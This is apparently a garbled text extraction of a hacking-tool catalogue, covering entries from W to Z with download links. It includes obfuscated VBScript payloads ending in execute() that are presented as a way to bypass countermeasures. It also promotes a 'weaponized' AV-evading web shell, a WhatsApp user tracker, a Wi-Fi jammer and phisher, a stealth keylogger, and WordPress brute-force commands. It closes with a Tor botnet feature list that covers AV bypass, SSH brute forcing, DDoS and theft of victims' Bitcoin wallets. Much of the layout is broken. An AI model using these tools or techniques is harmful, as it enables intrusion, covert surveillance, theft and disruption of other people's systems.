--wp-plugins-dir Same thing than --wp-content-dir but for the
plugins directory. If not supplied, WPScan will use wp-contentdir/plugins. Subdirectories are allowed
VANETOOLS ARGUMENTS
--help
| -h
--Verbose | -v
Verbose output.
--update
| -u
Generate a new
VANETOOLS EXAMPLES
Generate a new 'most popular' plugin list, up to 150 pages ...
ruby vanetools.rb --generate_plugin_list 150
DownloadVane
VBS-OBFUSCATOR - VBSCRIPT OBFUSCATION TO
ALLOW PENTESTERS BYPASS COUNTERMEASURES
Results (comparison)
First output
Dim SzVeVmXkoEZx, LALrsGQYjZtj, kLTOaGJfsmSG
SzVeVmXkoEZx =
"6974-6865*602140/5236*45732/444*-8743+8841*8842-8731*517
9-5059*-4646+4678*892-858*5573-5501*129-28*9855-9747*-668
1+6789*-9095+9206*257184/8037*311721/3583*-7211+7322*7416
84/6506*-5620+5728*241300/2413*198-165*-9925+9959*6380-63
36*5552-5520*-9222+9340*569-471*-6484+6563*6988-6881*1285
33/1627*-5150+5260*4828-4720*5616-5495*6062-6030*5407-536
4*313728/9804*-9272+9390*-767+865*3735-3662*-2705+2815*-4
151+4253*73704/664*-9531+9645*-7310+7419*-1882+1979*31713055*9554-9449*2676-2565*-1012+1122*107448/2442*4055-4023
*-6753+6787*2058-1974*-5464+5568*428610/4082*2479-2364*-3
013+3045*-9195+9300*128225/1115*56448/1764*-6899+6996*161
760/5055*253752/2328*756288/7488*-4081+4196*29900/260*-31
64+3261*-6830+6933*-6580+6681*-8764+8862*861360/7760*3308
40/2757*-2407+2441"
LALrsGQYjZtj = Split(SzVeVmXkoEZx,
chr(eval(261366/6223)))
for each SKhxsIKQEybA in LALrsGQYjZtj
kLTOaGJfsmSG = kLTOaGJfsmSG & chr(eval(SKhxsIKQEybA))
next
execute(kLTOaGJfsmSG)
Second output
Dim wEQHvB, vsSBaV, pwgtko
wEQHvB =
"-1912+2021*168-53*938948/9116*5796-5698*666666/6006*938818*-4889+4921*-9635+9669*302112/4196*-9587+9688*-4950+50
58*1012608/9376*-6763+6874*235232/7351*-8833+8920*412920/
3720*1007190/8835*594432/5504*-5605+5705*1113-1080*9516-9
482*347644/7901*181536/5673*198712/1684*615734/6283*779-7
00*6051-5944*-2574+2653*172370/1567*2086-1978*681472/5632
*4765-4733*-2746+2789*54880/1715*2593-2475*733040/7480*-5
259+5332*-7261+7371*103326/1013*-8585+8696*7371-7257*6640
-6531*4564-4467*-6527+6643*62265/593*-1349+1460*2314-2204
*-5438+5482*-5860+5892*4779-4745*1086-1002*-265+369*12761171*2588-2473*-2914+2946*101850/970*698050/6070*181760/5
680*3610-3513*236896/7403*5004-4895*4565-4464*720245/6263
*812360/7064*3582-3485*36977/359*4691-4590*482944/4928*-7
73+884*546720/4556*5235-5201"
vsSBaV = Split(wEQHvB, chr(eval(1039-997)))
for each KxRKRt in vsSBaV
pwgtko = pwgtko & chr(eval(KxRKRt))
next
execute(pwgtko)
Download VBS-Obfuscator
VBSCAN - AN BLACK BOX VBULLETIN VULNERABILITY
SCANNER
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
DownloadVBScan
WAIDPS - WIRELESS AUDITING, INTRUSION DETECTION
& PREVENTION SYSTEM
DownloadWAIDPS
WAKEMEONLAN V1.71 - TURN ON COMPUTERS ON YOUR
NETWORK WITH WAKE-ON-LAN PACKET
computer:
On some computers, you may need to enable this
feature on the BIOS setup.
In the network card properties, you should go to the
'Power Management' and/or 'Advanced' tabs of the
network adapter, and turn on the Wake-on-LAN
feature.
Start Using WakeMeOnLan
After scanning your network in the first time, it's very easily to
turn on the computers you need. Simply run WakeMeOnLan,
select the desired computers, and then choose the 'Wake Up
Selected Computer' option (F8).
After using the 'Wake Up Selected Computer' option, you can
run another network scan, to verify that the computers are
wakeupall command-line option. Like in the /wakeup commandline option, you can optionally specify broadcast address and
port number.
Examples:
WakeMeOnLan.exe /wakeupall
WakeMeOnLan.exe /wakeupall 20000 192.168.2.255 If you
want to wake up all computers in specific IP addresses range,
you can use /wakeupiprange command-line option
Examples:
WakeMeOnLan.exe /wakeupiprange 192.168.0.25
192.168.0.100
WakeMeOnLan.exe /wakeupiprange 192.168.0.11
192.168.0.20 20000 192.168.0.255
Scan Your Network From Command-Line
/
IPAddressF
rom <IP
Address>
/
IPAddressT
o <IP
Address>
/
UseIPAddr
essesRang
e <0 | 1>
/
UseNetwor
kAdapter
<0 | 1>
/
UseNetwor
kAdapter
<Name>
/
MacAddres
sFormat <1
| 2 | 3>
/
UseNetBio
s <0 | 1>
/cfg
<Filename
>
/stext
<Filename
>
/stab
<Filename
>
/scomma
<Filename
>
/stabular
<Filename
>
/shtml
<Filename
>
/sverhtml
<Filename
>
/sxml
<Filename
>
/sort
<column>
/nosort
DownloadWakeMeOnLan v1.71
WALDO - MULTITHREADED DIRECTORY AND
SUBDOMAIN BRUTEFORCER
Setup
DownloadWaldo
WAP - WEB APPLICATION PROTECTION
DownloadWAP
WATCHER V1.5.8 - WEB SECURITY TESTING TOOL AND
PASSIVE VULNERABILITY SCANNER
more.
DownloadWatcher v1.5.8
WEB SECURITY DOJO - TRAINING ENVIRONMENT FOR
WEB APPLICATION SECURITY PENETRATION TESTING
Why?
The Web Security Dojo is for learning and practicing web app
security testing techniques. It is ideal for self-teaching and skill
assessment, as well as training classes and conferences since
it does not need a network connection. The Dojo contains
everything needed to get started tools, targets, and
documentation.
Feature Overview
Targets include:
OWASPs WebGoat
Googles Gruyere
Damn Vulnerable Web App
Hacme Casino
OWASP InsecureWebApp
w3afs test website
simple training targets by Maven Security (including REST
and JSON)
Tools: (starred = new this version)
Burp Suite (free version)
w3af
sqlmap
arachni *
metasploit
Zed Attack Proxy *
OWASP Skavenger
OWASP Dirbuster
Paros
Webscarab
Ratproxy
skipfish
websecurify
davtest
J-Baah
JBroFuzz
Watobo *
RATS
helpful Firefox add-ons
1.
2.
3.
4.
Requirements
Install BeautifulSoup
Platforms
Linux (any)
Mac (Not tested)
Windows (Not tested)
[!] If weeman runs on your platform (Mac/Windows), please let
me know.
Usage
Just type help
Run server:
The settings will be saved for the next time you run weeman.py.
DownloadWeeman
WEEVELY3 - WEAPONIZED WEB SHELL
The remote agent is a very low footprint php script that receives
dynamically injected code from the client, extending the client
functionalities over the network at run-time. The agent code is
polymorphic and hardly detectable by AV and HIDS. The
communication is covered and obfuscated within the HTTP
protocol using steganographic techniques.
Modules development
Linux
The following example runs on a Debian/Ubuntu derived Linux
environments with Python version 2.7.
# Make sure that the python package manager and yaml
libraries are installed
$ sudo apt-get install g++ python-pip libyaml-dev pythondev
# Install requirements
$ sudo pip install prettytable Mako PyYAML pythondateutil PySocks --upgrade
OS X
The following example runs on OS X with the Macports
packaging system.
$ sudo port install python27 py27-pip
$ sudo port select --set pip pip27
$ sudo port select --set python python27
# Ideally, at this point you should install editline
library (http://thrysoee.dk/editline/)
# to have a working line completion in terminal. See
issue #7 for more info.
$ sudo pip install prettytable Mako PyYAML pythondateutil readline PySocks --upgrade
Windows
The following example runs on Microsoft Windows 7 with
Python version 2.7, and likely on other Windows version. First
of all, install Python 2.7 and pip package manager using
ez_setup.py as explained in this guide.
# Enter in a folder which allows to call pip.exe usually
C:\Python27\Scripts\ with no %PATH% set and
# install the following requirements
Then, upload the generated agent under the target web folder.
Make sure that the agent PHP script is properly exposed and
executable through the web server.
Connect to the agent
Download Weevely3
WFUZZ - THE WEB APPLICATION BRUTEFORCER
Payloads
File
List
hexrand
range
names
hexrange
Encodings
random_uppercase
urlencode
binary_ascii
base64
double_nibble_hex
uri_hex
sha1
md5
double_urlencode
utf8
utf8_binary
html
html decimal
custom
many more...
Iterators
Product
Zip
Chain
Download Wfuzz
WHATSSPY - TRACE THE MOVES OF A WHATSAPP USER
Shortlist requirements:
Secondary Whatsapp account (phonenumber that doesn't
use Whatsapp)
Rooted Android phone OR Jailbroken iPhone OR PHP
knowledge
Server/RPi that runs 24/7
Nginx or Apache with PHP with PDO (php5-pgsql
installed) (you can't host on simple webhoster, you need
bash)
Postgresql
Notice
Once the tracker is started, you will not be able to recieve any
messages over Whatsapp for this phonenumber. You can
either try to register an non-Whatsapp used phonenumber with
for example this script or just buy an 5 euro SIM Card and use
this phonenumber for the tracker.
For the tracker to work you need an secret which is retrieved
from either your Phone or the register script mentioned above.
In case of phone registration you need an jailbroken iPhone or
rooted Android device in order to retrieve the secret.
Jailbroken iPhone users: You can retrieve using this
script.
Rooted Android phones can use the following APK to
retrieve the secret.
In order to retrieve the scecret you need to follow these steps:
Insert your (new) secondary SIM card in your phone and
boot it up.
Re-install Whatsapp on your phone and activate it using
the new phonenumber.
Use either the APK (Android) or the script (iPhone) to
retrieve the WhatsApp secret. Write this secret down,
which is required later.
Insert your normal SIM card and re-install WhatsApp for
normal use.
DownloadWhatsSpy
WHONIX V11 - ANONYMOUS OPERATING SYSTEM
build
script:
added
fakeroot
to
whonix_build_script_build_dependency (required for verifiable
builds)
genmkfile: if debuild not available, recommend installation of
the devscripts package
g e n m k fi l e : fi x , d o n o t s e t a u t o m a t i c a l l y
make_use_gain_root_command to true if fakeroot is not
installed
genmkfile: run dpkg-checkbuilddeps before lintian to show
better hint if build dependencies are missing
build script: build-steps.d/1200_create-debian-packages:
commented out get_extra_packages, no longer need to
download packages from testing
build script: refactoring, created separate help step, helpsteps/git_sanity_test
whonixcheck:
verbose
output
for
check_tor_socks_port_reachability
all packages: packaging, bumped Standards-Version from
3.9.4 to 3.9.6 for jessie support
lintian warning copyright fix
tb-updater: show highest version number is not necessarily
the best one message also on first run if no Tor Browser is
installed yet https://phabricator.whonix.org/T283
build script: No longer install acpi-support-base by default on
jessie, because systemd now implements that functionality.
https://phabricator.whonix.org/T284
whonixcheck: added link to Whonix Build Version
documentation https://www.whonix.org/wiki/
Whonixcheck#Whonix_Build_Version https://
phabricator.whonix.org/T276
build
script:
Fix
commit
287bdcf6ddee007ba579e3ee9a1997edc8188581 makefile:
added pedantic to default DEBUILD_LINTIAN_OPTS because
we are going to fix the last remaining missing upstream
changelog warning added pedantic help-steps/variables.
can now use StandardInput=tty and read instead of systemdask-password. Now we could even implement an interactive
menu at boot (that allows to configure wait time and/or
disabling rads). https://phabricator.whonix.org/T57
whonixcheck: abolished random wait by default https://
phabricator.whonix.org/T299
anon-ws-disable-stacked-tor: fixed insserv: script
tor.anondist-orig: service tor already provided! warning during
upgrades https://phabricator.whonix.org/T303
anon-ws-disable-stacked-tor: systemd compatibility https://
phabricator.whonix.org/T303
anon-base-files: no longer set -o pipefail in /usr/lib/pre.bsh.
config-package-dev doesnt like set -o pipefail http://
mailman.mit.edu/pipermail/config-package-dev/2015-May/
000041.html https://phabricator.whonix.org/T329
upstream bug report: spaces in Tors systemd unit file causes
issues https://trac.torproject.org/projects/tor/ticket/16162
upstream bug report: Tor dies on reload when swichting to
DisableNetwork 0 when using DnsPort 127.0.0.1:53 https://
trac.torproject.org/projects/tor/ticket/16161
build script: fix, support verifiable false (was verifiable
minimal while build documentation said false)
uwt: multi user fix https://www.whonix.org/forum/index.php/
topic,1267
Qubes: WiFi Realtek RTL8191SEvB Issue and Solution
https://groups.google.com/forum/#!topic/qubes-users/
kMGTSwP72aU
whonix-setup-wizard API proposal: https://www.whonix.org/
wiki/Dev/whonixsetup
DownloadWhonix v11
WIFIINFOVIEW V1.79 - WIFI SCANNER FOR WINDOWS 7/8/
VISTA
detected.
Last Detection: The last date/time that this network was
detected.
Detection Count: The number of times that this network
was detected.
Command-Line Options
/cfg
<Filename>
/
NumberOfS
cans
<Number>
/stext
<Filename>
/stab
<Filename>
/scomma
<Filename>
/stabular
<Filename>
/shtml
<Filename>
/sverhtml
<Filename>
/sxml
<Filename>
/sort
<column>
/nosort
/
UseOnlyAd
apter <0 |
1>
/
NetworkAda
pter
<Adapter
Guid>
/
SortOnEver
yUpdate <0
| 1>
/
MacAddress
Format <1 3>
/
DisplayMod
e <1 - 11>
/
UpdateRate
<1 - 4>
DownloadWifiInfoView v1.79
WIFIJAMMER - CONTINUOUSLY JAM ALL WIFI CLIENTS/
ROUTERS
Continuously jam all wifi clients and access points within range.
The effectiveness of this script is constrained by your wireless
card. Alfa cards seem to effectively jam within about a block
radius with heavy access point saturation. Granularity is given
in the options for more effective targeting.
Requires: python 2.7, python-scapy, a wireless card capable of
injection
Usage
Simple
python wifijammer.py
This will find the most powerful wireless interface and turn on
monitor mode. If a monitor mode interface is already up it will
use the first one it finds instead. It will then start sequentially
hopping channels 1 per second from channel 1 to 11 identifying
all access points and clients connected to those access points.
On the first pass through all the wireless channels it is only
identifying targets. After that the 1sec per channel time limit is
eliminated and channels are hopped as soon as the deauth
packets finish sending. Note that it will still add clients and APs
as it finds them after the first pass through.
Upon hopping to a new channel it will identify targets that are
on that channel and send 1 deauth packet to the client from the
AP, 1 deauth to the AP from the client, and 1 deauth to the AP
destined for the broadcast address to deauth all clients
connected to the AP. Many APs ignore deauths to broadcast
addresses.
python wifijammer.py -a 00:0E:DA:DE:24:8E -c 2
-c, Set the monitor mode interface to only listen and deauth
clients or APs on channel 1
-p, Send 5 packets to the client from the AP and 5 packets to
the AP from the client along with 5 packets to the broadcast
address of the AP
-t, Set a time interval of .00001 seconds between sending each
deauth (try this if you get a scapy error like 'no buffer space')
-s, Do not deauth the MAC DL:3D:8D:JJ:39:52. Ignoring a
certain MAC address is handy in case you want to tempt
Download WiFiJammer
WIFIPHISHER - FAST AUTOMATED PHISHING ATTACKS
AGAINST WIFI NETWORKS
Explanation
maxi
mum
noup
date
timei
nterv
al
pack
ets
direct
edonl
y
acces
spoin
t
jI
jamm
ingint
erfac
e
a
I
apint
erfac
e
Screenshots
A successful attack
Requirements
Kali Linux.
Two wireless network interfaces, one capable of injection.
DownloadWiFiPhisher
WIFRESTI - FIND YOUR WIRELESS NETWORK
PASSWORD FROM WINDOWS, LINUX AND MAC OS
Requirements
Instalation
sudo su
git clone https://github.com/LionSec/wifresti.git && cp
wifresti/wifresti.py /usr/bin/wifresti && chmod +x /usr/
bin/wifresti
sudo wifresti
DownloadWifresti
WIG - WEBAPP INFORMATION GATHERER
Requirements
Python 2.
How it works
example.com
optional arguments:
-h, --help
-l INPUT_FILE
-n STOP_AFTER
detected
-m
--no_cache_load
--no_cache_save
-N
no_cache_save
--verbosity, -v
localhost:8080)
-w OUTPUT_FILE
Example of run:
$ ./wig.py example.com
dP
dP
dP
dP
.88888.
88
88
88
88
d8'
88
.8P
.8P
88
88
88
d8'
d8'
88
88
88.d8P8.d8P
88
Y8.
8888' Y88'
dP
`88
YP88
.88
`88888'
TITLE
--- HTML TITLE --IP
255.255.255.256
SOFTWARE
VERSION
CATEGORY
Drupal
7.32
ASP.NET
4.0.30319.18067
Platform
Microsoft-HTTPAPI
2.0
Platform
Microsoft-IIS
Platform
Microsoft Windows Server
2012
Operating System
SOFTWARE
VULNERABILITIES
LINK
Drupal 7.28
http://cvedetails.com/version/169265
Drupal 7.29
http://cvedetails.com/version/169917
Drupal 7.30
http://cvedetails.com/version/169916
URL
NOTE
CATEGORY
/login/
Test directory
Interesting URL
/login/index_form.html
Interesting URL
/robots.txt
robots.txt index
Interesting URL
/test/
Test directory
Interesting URL
_________________________________________________________
______________________
Time: 15.7 sec
Urls: 351
Fingerprints: 28989
Download wig
WINDOWS SPY KEYLOGGER - SOFTWARE TO LOG
KEYSTROKES IN STEALTH MODE FOR 32-BIT/64-BIT
PROCESSES ON WINDOWS XP/VISTA/7/8/10
How to Use?
'Windows Spy Keylogger' is very easy to use tool with its cool
GUI interface.
Here are the simple steps,
Run 'Windows Spy Keylogger' on your system
It will show you the current status of Keylogger as seen in
the screenshots below.
Now you can just click on button below to Start or Stop
Keylogger
That's all :)
Also you can customize various options (run at startup, log
path, version check etc) using the 'Settings Dialog' by click on
the button at bottom right corner.
Background Scan
/cfg
<Filename
>
/stext
<Filename
>
/stab
<Filename
>
/scomma
<Filename
>
/stabular
<Filename
>
/shtml
<Filename
>
/sverhtml
<Filename
>
/sxml
<Filename
>
Background Scan
Command-Line Options
/cfg
<Filename
>
/stext
<Filename
>
/stab
<Filename
>
/scomma
<Filename
>
/stabular
<Filename
>
/shtml
<Filename
>
/sverhtml
<Filename
>
/sxml
<Filename
>
might notice that the scroll bar itself looks odd. It now features a
map of nearby packets, similar to the minimap available in
many modern text editors. The number of packets shown in the
map is the same as the number of physical vertical pixels in
your scrollbar. The more pixels you have, the more packets you
can see. In other words, if you use Wireshark regularly you now
have a legitimate business case for a retina display.
Statistics dialogs. The dialogs under the Statistics and
Telephony menus have seen many improvements. The
backend code has been consolidated so that most of
Wiresharks statistics now share common internal logic. This in
turn let us create common UI code with many workflow
improvements and a much more consistent interface.
I/O Graph dialog. You can now graph as many items as you
like and save graphs as PDF, PNG, JPEG, and BMP. Graph
settings stay with your profile so you can customize them for
multiple environments.
Follow Stream dialog. You can now switch between streams
and search for text.
General dialogs. Many dialogs now have context-aware hints.
For example the I/O Graph and Follow Stream dialogs will tell
you which packet corresponds to the graph or stream data
under your cursor. Most of them will stay open after you close a
capture file so that you can compare statistics or graphs
between captures.
DownloadWireshark v2.0.0
WOODPECKER HASH BRUTEFORCE - MULTITHREADED
PROGRAM TO PERFORM A BRUTE-FORCE ATTACK
AGAINST A HASH
Wordpress Brute Force Multithreading with standard and xmlrpc login method written in python.
Features:
1.
2.
3.
4.
5.
Multithreading
xml-rpc brute force mode
http and https protocols support
Random User Agent
Big wordlist support
Usage:
Standard login request:
python wordbrutepress.py -S -t http[s]://
target.com[:port] -u username -w wordlist [--timeout in
sec]
Xml-rpc login request:
python wordbrutepress.py -X -t http[s]://
target.com[:port] -u username -w wordlist [--timeout in
sec]
CHANGELOG
2015-11-20 v2.1
1) Add new feature: Big wordlist support (thanks to guly
@theguly)
2) Fix faultcode check instead of "403" code for XML-RPC
(thanks to guly @theguly)
2015-04-12 v2.0
1) Add new feature: xml-rpc brute force mode
2) Fix minor bugs
2015-04-11 v1.1
1) optparse (Deprecated since version 2.7) replaced by
argparse
2) Fix connection bugs
Download Wordbrutepress
WPHARDENING 1.5 - FORTIFY THE SECURITY OF ANY
WORDPRESS INSTALLATION
Usage
$ python wphardening.py -h
__
_______
\ \
/ /
__ \| |
| |
| |
(_)
\ \
/\
_ __
__ _
\ \/
\/ / |
___/|
__
|/ _` | '__/ _` |/ _ \ '_ \|
| '_ \ / _` |
\
/\
| |
| |
| | (_| | | | (_| |
|_|
|_|
|_|\__,_|_|
__/ | | |
| | | | (_| |
\/
\/
\__,_|\___|_| |_|
_|_| |_|\__, |
__/ |
Fortify the security of any WordPress
installation.
|___/
exit
-h, --help
-v, --verbose
results
--update
stable version
Target:
This option must be specified to modify the package
WordPress.
-d DIRECTORY, --dir=DIRECTORY
**REQUIRED** - Working Directory.
--load-conf=FILE
Hardening:
Different tools to hardening WordPress.
-c, --chmod
files.
-r, --remove
-b, --robots
-f, --fingerprinting
Deleted fingerprinting WordPress.
-t, --timthumb
--chown=user:group
owner.
--wp-config
--plugins
--proxy=PROXY
contents of directories.
--minify
and .js
--malware-scan
project.
Miscellaneous:
-o FILE, --output=FILE
Write log report to FILE.log
Examples
Change permissions
This option is to add the correct permissions to files and
directories.
$ python wphardening.py -d /home/path/to/wordpress -chmod -v
WPHardening update
With this option you can always have the latest version of
WPHardening.
$ python wphardening.py --update
DownloadWS-Attacker
XIAOPAN OS - PENTESTING DISTRIBUTION FOR
WIRELESS SECURITY ENTHUSIASTS
Alternatives
DownloadXiaopan OS
XPL-SEARCH - SEARCH EXPLOITS IN MULTIPLE EXPLOIT
DATABASES
XPL SEARCH
Search exploits in multiple exploit databases!
Exploit databases available:
* Exploit-DB
* MIlw0rm
* PacketStormSecurity
* IntelligentExploit
* IEDB
* CVE
Lib
Enabled
Lib
cURL Version
7.40.0 or higher
allow_url_fopen
On
Permission
ABOUT DEVELOPER
Author_Nick
CoderPIRATA
Author_Name
Eduardo
coderpirata@gmail.com
Blog
http://coderpirata.blogspot.com.br/
https://twitter.com/coderpirata
Google+
https://plus.google.com/
103146866540699363823
Pastebin
http://pastebin.com/u/CoderPirata
Github
https://github.com/coderpirata/
"CHANGELOG"
0.1 - [02/07/2015]
- Started.
0.2 - [12/07/2015]
- Added Exploit-DB.
- Added Colors, only for linux!
- Added Update Function.
- "Generator" of User-Agent reworked.
- Small errors and adaptations.
0.3 - [22/07/2015]
- Bugs solved.
- Added "save" Function.
- Added "set-db" function.
0.4 - [05/08/2015]
- Save function modified.
- Added Scan with list.
0.5 - [29/08/2015]
Screenshot
Download XPL-SEARCH
XPLICO V1.1.1 - OPEN SOURCE NETWORK FORENSIC
ANALYSIS TOOL (NFAT)
Download Xplico
XSSYA V2.0 - CROSS SITE SCRIPTING SCANNER &
VULNERABILITY CONFIRMATION
* Support HTTPS
* After Confirmation (execute payload to get cookies)
* Can be run in (Windows - Linux)
* Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG
IP)
DownloadXSSYA v2.0
YARGEN - A GENERATOR FOR YARA RULES (FOR
MALWARE RESEARCHERS)
Memory Requirements
Warning: yarGen pulls the whole goodstring database to
memory and uses up to 2 GB of memory for a few seconds.
-m M
-g G
-p prefix
-a author
Author Name
-r ref
Reference
-l min-size
(default=8)
-z min-score
(default=5)
-s max-size
(default=128)
-rc maxstrings
(default=20,
intelligent filtering will be
applied)
-nr
directories
-oe
(default=3)
--score
in the rules
--inverse
in the rules
--nodirname
in inverse rules
--noscorefilter
score (default in
'inverse' mode)
--excludegood
strings
--nosimple
condition statement
--nofilesize
condition statement
-fm FM
'filesize' condition
(default: 5)
--noglobal
--nosuper
Debug output
Best Practice
score. To see how a certain string in the rule scored, use the "-score" parameter.
python yarGen.py --score -m X:\MAL\Case1401
You can also instruct yarGen not to include the file path but
solely rely on the filename.
python yarGen.py --inverse -oe --nodirname -m G:\goodware
\
DownloadyarGen
YASUO - SCANS FOR VULNERABLE & EXPLOITABLE
3RD-PARTY WEB APPLICATIONS
Details
DownloadYASUO
YAVOL - GUI FOR VOLATILITY FRAMEWORK AND YARA
This is just another GUI for volatility and yara which could make
someone's life easier. It is inteded for Incident responders for
quick examination of a memory image. Results are stored in
sqlite db for reuse.
1. INSTALLATION
Clone repo
2. PREREQUISITES
you need to have installed Python (2.7), PyQt4, and sqlite3
DownloadYaVol
ZAP 2.4.2 - PENETRATION TESTING TOOL FOR TESTING
WEB APPLICATIONS
Bug fixes:
Issue 1760 : Unable to initialize home directory! xml/
config.xml (No such file or directory)
Issue 1763 : Automatic check for updates fails to report
new versions
Issue 1770 : Exceptions when calling (some) context API
actions in daemon mode
Issue 1771 : For OSX the zap.sh in the core download
hard-codes the relative java location
Issue 1772 : On OS X, Found Java version lies
Issue 1777 : "Cannot locate configuration source
null.policy" after opening "Active Scan" dialogue
Issue 1781 : ZAP errors with "Unsupported option 'psn_x_xxxxxxx'" on OS X
Issue 1784 : NullPointerException when active scanning
through the API with a target without scheme
Issue 1785 : Plugin enabled even if dependencies are not,
"hangs" active scan
Issue 1787 : Context not used by the Spider even if
selected
Issue 1788 : Scan Progress Pane Needs Sorting Change
Issue 1789 : Forced Browse/AJAX Spider messages not
restored to Sites tab
Issue 1792 : Report not generated in daemon mode
Issue 1798 : Stop Attack Feature Locks up ZAP?
Issue 1804 : Disable processing of XML external entities
by default
Issue 1805 : ZAP API might not return the response in
requested format on errors
Issue 1858 : Spider might report wrong progress after
finishing
DownloadZAP 2.4.2
ZER0 - SECURED FILE DELETION MADE EASY
Features
DownloadZer0
ZERONET - DECENTRALIZED WEBSITES USING BITCOIN
CRYPTO AND BITTORRENT NETWORK
Why?
Features
How to join?
Windows
Debian
Mac
Install Homebrew
Vagrant
vagrant up
cd /vagrant
Run python zeronet.py --ui_ip 0.0.0.0
Docker
docker run -p 15441:15441 -p 43110:43110 nofish/
zeronet
Download ZeroNet
ZIB - THE OPEN TOR BOTNET
Features
binaries.
Self spreading.
All bot files are SHA256 hash verified. Broken/corrupted
files get replaced.
Bypasses AntiVirus Deep-Scan.
Bot location varies, depending on administrative access.
IRC nickname format: Country[version]windows version|
CPU bits|User Privileges|CPU cores|random characters.
Ex: US[v2]XP|x32|A|4c|F4L0s4kpN5. 64-bit detection may
be having issues (shows up as 32-bit).
Disables various windows functions WITHOUT giving the
user warnings!
Disables Microsoft Windows error reporting, sending
additional data, and error logging - System-wide as
administrator, and on a per-user basis.
Disables User Access Control (UAC) - System-wide as
administrator, and on a per-user basis.
Disables Windows Volume Shadow Copy Backup Service
(vss) - System-wide as administrator.
Disables System Restore Service (srservice) - SystemWide as administrator.
Disables System Restore - System-Wide as administrator.
Melts on execution. Original file gets deleted. Should
delete the file out of the temporary folder, if used with a
binder.
Multi-threaded mass SSH scanner that saves servers are
on the bot's HDD encoded with base64 without duplicates,
or honeypots. Four integrated password lists of increasing
difficulty [A,B,C,D], or brute force with min/max characters
(supports numbers, upper/lowercase letters, symbols).
Cracked routers are used for UDP/TCP/HTTP/ICMP
flooding. UDP flood requires having the routers download
a python script, and the majority of routers won't have
Python. Has the ability to be used to take down DDoSprotected servers from scanning with just one bot. The
Open Tor Botnet optionally will scan under Tor, multiple
executed files, and update files. This means that you don't
get the "Would you like to run this program?" dialog, and it
runs completely hidden.
Detects all Windows operating systems from Windows 95,
ME, to 8. Will show Windows 10 as just Windows, or W8.
Text-To-Speech with speaker detection.
Duplicate nick-name handling, and ping-out handling.
Tor is downloaded directly from the Tor Project - It only
needs to be downloaded once, but still has persistence.
Grabs the bot IP address on startup, has the ability to
disable/enable bot command response, view status of ssh
scanner/omegle spreading/ddos/botkiller and start/stop
them.
Functionality to kill the bot instance, uninstall ZIB, grab full
OS info, check if a host on a certain port is online/offline
using TCP connect and a full HTTP request whilst
checking the reply for server status related information.
Check if a process is running, how many are running, and
list directories. Use \ instead of C:\, e.x !dir \ as some
people run their main operating system on non-standard
drive letters, especially on servers.
Upload specific files of your choosing that exist on a bot's
computer to your FTP server. Files that can be uploaded
could include BTC wallets.
Read files in plain-text off zombie computers. View
amount of scanned SSH servers. Kill processes. The bot
will tell you about missing command parameters, if a
certain parameter contains the wrong data-type, etc.
Errors from executing a command are outputted to the
IRC channel without flooding the chat.
Commands are ran mutli-threaded and con-currently. This
means your bots wont freeze up each time you run a
command.
Download Zib-Trojan